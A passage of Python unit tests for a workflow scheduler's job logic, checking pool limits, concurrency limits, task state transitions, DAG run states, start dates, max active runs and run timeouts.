session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(2, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING], session=session))
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(3, DAG.get_num_task_instances(dag_id, dag.task_ids,
states=[State.RUNNING, State.QUEUED], session=session))
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(
dag_id='test_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag1,
owner='airflow')
DummyOperator(
task_id='dummy_b',
dag=dag1,
owner='airflow')
dag2 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_dont_change',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag2,
owner='airflow')
dag3 = DAG(
dag_id='test_change_state_for_tis_without_dagrun_no_dagrun',
start_date=DEFAULT_DATE)
DummyOperator(
task_id='dummy',
dag=dag3,
owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0, run_duration=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEquals(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.NONE)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
processor.get_last_finish_time.return_value = None
scheduler = SchedulerJob(num_runs=0, run_duration=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler._execute_helper(processor_manager=processor)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except (AirflowException, XToolException):
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except (AirflowException, XToolException): # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
session = settings.Session()
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# still one task
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_scheduler_task_start_date(self):
"""
Test that the scheduler respects task start dates that are different
from DAG start dates
"""
dag_id = 'test_task_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
session = settings.Session()
tiq = session.query(TI).filter(TI.dag_id == dag_id)
ti1s = tiq.filter(TI.task_id == 'dummy1').all()
ti2s = tiq.filter(TI.task_id == 'dummy2').all()
self.assertEqual(len(ti1s), 0)
self.assertEqual(len(ti2s), 2)
for t in ti2s:
self.assertEqual(t.state, State.SUCCESS)
def test_scheduler_multiprocessing(self):
"""
Test that the scheduler can successfully queue multiple dags in parallel
"""
dag_ids = ['test_start_date_scheduling', 'test_dagrun_states_success']
for dag_id in dag_ids:
dag = self.dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
num_runs=2)
scheduler.run()
# zero tasks ran
dag_id = 'test_start_date_scheduling'
session = settings.Session()
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
def test_scheduler_dagrun_once(self):
"""
Test if the scheduler does not create multiple dagruns
if a dag is scheduled with @once and a start_date
"""
dag = DAG(
'test_scheduler_dagrun_once',
start_date=timezone.datetime(2015, 1, 1),
schedule_interval="@once")
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_process_task_instances(self):
"""
Test if _process_task_instances puts the right task instances into the
queue.
"""
dag = DAG(
dag_id='test_scheduler_process_execute_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
def test_scheduler_do_not_schedule_removed_task(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dag = DAG(
dag_id='test_scheduler_do_not_schedule_removed_task',
start_date=DEFAULT_DATE)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_schedule_too_early(self):
dag = DAG(
dag_id='test_scheduler_do_not_schedule_too_early',
start_date=timezone.datetime(2200, 1, 1))
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_do_not_run_finished(self):
dag = DAG(
dag_id='test_scheduler_do_not_run_finished',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances(session=session)
for ti in tis:
ti.state = State.SUCCESS
session.commit()
session.close()
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
queue.put.assert_not_called()
def test_scheduler_add_new_task(self):
"""
Test if a task instance will be added if the dag is updated
"""
dag = DAG(
dag_id='test_scheduler_add_new_task',
start_date=DEFAULT_DATE)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 1)
dag_task2 = DummyOperator(
task_id='dummy2',
dag=dag,
owner='airflow')
queue = Mock()
scheduler._process_task_instances(dag, queue=queue)
tis = dr.get_task_instances()
self.assertEquals(len(tis), 2)
def test_scheduler_verify_max_active_runs(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr = scheduler.create_dag_run(dag)
self.assertIsNone(dr)
def test_scheduler_fail_dagrun_timeout(self):
"""
Test if a a dagrun wil be set failed if timeout
"""
dag = DAG(
dag_id='test_scheduler_fail_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
dr2 = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr2)
dr.refresh_from_db(session=session)
self.assertEquals(dr.state, State.FAILED)
def test_scheduler_verify_max_active_runs_and_dagrun_timeout(self):
"""
Test if a a dagrun will not be scheduled if max_dag_runs has been reached and dagrun_timeout is not reached
Test if a a dagrun will be scheduled if max_dag_runs has been reached but dagrun_timeout is also reached
"""
dag = DAG(
dag_id='test_scheduler_verify_max_active_runs_and_dagrun_timeout',
start_date=DEFAULT_DATE)
dag.max_active_runs = 1
dag.dagrun_timeout = datetime.timedelta(seconds=60)
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(dr)
# Should not be scheduled as DagRun has not timedout and max_active_runs is reached
new_dr = scheduler.create_dag_run(dag)
self.assertIsNone(new_dr)
# Should be scheduled as dagrun_timeout has passed
dr.start_date = timezone.utcnow() - datetime.timedelta(days=1)
session.merge(dr)
session.commit()
new_dr = scheduler.create_dag_run(dag)
self.assertIsNotNone(new_dr)
def test_scheduler_max_active_runs_respected_after_clear(self):
"""
Test if _process_task_instances only schedules ti's up to max_active_runs
(related to issue AIRFLOW-137)
"""
dag = DAG(
dag_id='test_scheduler_max_active_runs_respected_after_clear',
start_date=DEFAULT_DATE)
dag.max_active_runs = 3
dag_task1 = DummyOperator(
task_id='dummy',
dag=dag,
owner='airflow')
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag.clear()
# First create up to 3 dagruns in RUNNING state.
scheduler.create_dag_run(dag)
# Reduce max_active_runs to 1
dag.max_active_runs = 1
queue = Mock()
# and schedule them in, so we can check how many
# tasks are put on the queue (should be one, not 3)
scheduler._process_task_instances(dag, queue=queue)
queue.append.assert_called_with(
(dag.dag_id, dag_task1.task_id, DEFAULT_DATE, TRY_NUMBER)
)
@patch.object(TI, 'pool_full')
